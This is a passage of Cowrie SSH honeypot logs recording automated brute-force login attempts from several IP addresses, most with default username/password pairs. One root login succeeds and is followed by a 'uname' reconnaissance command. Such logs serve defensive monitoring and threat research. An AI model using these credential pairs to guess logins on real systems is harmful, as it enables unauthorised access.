es128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:02.546337Z","src_ip":"212.227.125.160","session":"39f68b816c15"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:02.869692Z","src_ip":"212.227.125.160","session":"39f68b816c15"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:03.924070Z","src_ip":"212.227.125.160","session":"39f68b816c15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43428,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b883a6fba37","protocol":"ssh","message":"New connection: 212.227.125.160:43428 (1.2.3.4:22) [session: 1b883a6fba37]","sensor":"my-vps","timestamp":"2025-08-26T11:28:06.897651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:06.898857Z","src_ip":"212.227.125.160","session":"1b883a6fba37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:06.956211Z","src_ip":"212.227.125.160","session":"1b883a6fba37"}
{"eventid":"cowrie.login.failed","username":"cephadm","password":"cephadm","message":"login attempt [cephadm/cephadm] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:07.122536Z","src_ip":"212.227.125.160","session":"1b883a6fba37"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:08.201447Z","src_ip":"212.227.125.160","session":"1b883a6fba37"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50874,"dst_ip":"1.2.3.4","dst_port":22,"session":"d146231f413f","protocol":"ssh","message":"New connection: 83.168.105.65:50874 (1.2.3.4:22) [session: d146231f413f]","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.736550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.737211Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.778653Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44200,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8648b7a462d","protocol":"ssh","message":"New connection: 212.227.125.160:44200 (1.2.3.4:22) [session: e8648b7a462d]","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.855209Z"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.898510Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:12.900478Z","src_ip":"212.227.125.160","session":"e8648b7a462d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:28:13.044305Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:28:13.044976Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:13.046295Z","src_ip":"212.227.125.160","session":"e8648b7a462d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:13.085368Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:13.086469Z","src_ip":"83.168.105.65","session":"d146231f413f"}
{"eventid":"cowrie.login.failed","username":"super","password":"super","message":"login attempt [super/super] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:13.505965Z","src_ip":"212.227.125.160","session":"e8648b7a462d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:14.561059Z","src_ip":"212.227.125.160","session":"e8648b7a462d"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":45158,"dst_ip":"1.2.3.4","dst_port":22,"session":"e368b5d7cf4b","protocol":"ssh","message":"New connection: 93.123.109.189:45158 (1.2.3.4:22) [session: e368b5d7cf4b]","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.203404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.204075Z","src_ip":"93.123.109.189","session":"e368b5d7cf4b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.223739Z","src_ip":"93.123.109.189","session":"e368b5d7cf4b"}
{"eventid":"cowrie.login.failed","username":"massa","password":"massa","message":"login attempt [massa/massa] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.284405Z","src_ip":"93.123.109.189","session":"e368b5d7cf4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44970,"dst_ip":"1.2.3.4","dst_port":22,"session":"98baab096db4","protocol":"ssh","message":"New connection: 212.227.125.160:44970 (1.2.3.4:22) [session: 98baab096db4]","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.845252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.846307Z","src_ip":"212.227.125.160","session":"98baab096db4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:18.896968Z","src_ip":"212.227.125.160","session":"98baab096db4"}
{"eventid":"cowrie.login.failed","username":"x2goprint","password":"x2goprint","message":"login attempt [x2goprint/x2goprint] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:19.052695Z","src_ip":"212.227.125.160","session":"98baab096db4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:19.306322Z","src_ip":"93.123.109.189","session":"e368b5d7cf4b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:20.229979Z","src_ip":"212.227.125.160","session":"98baab096db4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45740,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fbb87f9a2d1","protocol":"ssh","message":"New connection: 212.227.125.160:45740 (1.2.3.4:22) [session: 2fbb87f9a2d1]","sensor":"my-vps","timestamp":"2025-08-26T11:28:25.152676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:25.153459Z","src_ip":"212.227.125.160","session":"2fbb87f9a2d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:25.206402Z","src_ip":"212.227.125.160","session":"2fbb87f9a2d1"}
{"eventid":"cowrie.login.failed","username":"azureuser","password":"azureuser","message":"login attempt [azureuser/azureuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:25.367661Z","src_ip":"212.227.125.160","session":"2fbb87f9a2d1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:26.427113Z","src_ip":"212.227.125.160","session":"2fbb87f9a2d1"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54654,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7616247f05d","protocol":"ssh","message":"New connection: 83.168.105.65:54654 (1.2.3.4:22) [session: c7616247f05d]","sensor":"my-vps","timestamp":"2025-08-26T11:28:28.192028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:28.193046Z","src_ip":"83.168.105.65","session":"c7616247f05d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:28.234026Z","src_ip":"83.168.105.65","session":"c7616247f05d"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:28.357047Z","src_ip":"83.168.105.65","session":"c7616247f05d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:29.400419Z","src_ip":"83.168.105.65","session":"c7616247f05d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46506,"dst_ip":"1.2.3.4","dst_port":22,"session":"05a30519fc94","protocol":"ssh","message":"New connection: 212.227.125.160:46506 (1.2.3.4:22) [session: 05a30519fc94]","sensor":"my-vps","timestamp":"2025-08-26T11:28:30.940461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:30.975522Z","src_ip":"212.227.125.160","session":"05a30519fc94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:31.039783Z","src_ip":"212.227.125.160","session":"05a30519fc94"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"password","message":"login attempt [minecraft/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:31.225936Z","src_ip":"212.227.125.160","session":"05a30519fc94"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:32.283278Z","src_ip":"212.227.125.160","session":"05a30519fc94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47272,"dst_ip":"1.2.3.4","dst_port":22,"session":"24d239031662","protocol":"ssh","message":"New connection: 212.227.125.160:47272 (1.2.3.4:22) [session: 24d239031662]","sensor":"my-vps","timestamp":"2025-08-26T11:28:36.433708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:36.434647Z","src_ip":"212.227.125.160","session":"24d239031662"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:36.484165Z","src_ip":"212.227.125.160","session":"24d239031662"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:36.634766Z","src_ip":"212.227.125.160","session":"24d239031662"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:37.917717Z","src_ip":"212.227.125.160","session":"24d239031662"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64136,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc13804761b3","protocol":"ssh","message":"New connection: 217.72.205.35:64136 (1.2.3.4:22) [session: fc13804761b3]","sensor":"my-vps","timestamp":"2025-08-26T11:28:40.222747Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:40.223879Z","src_ip":"217.72.205.35","session":"fc13804761b3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34776,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57a40d678a3","protocol":"ssh","message":"New connection: 196.251.86.249:34776 (1.2.3.4:22) [session: e57a40d678a3]","sensor":"my-vps","timestamp":"2025-08-26T11:28:41.751752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.261084Z","src_ip":"196.251.86.249","session":"e57a40d678a3"}
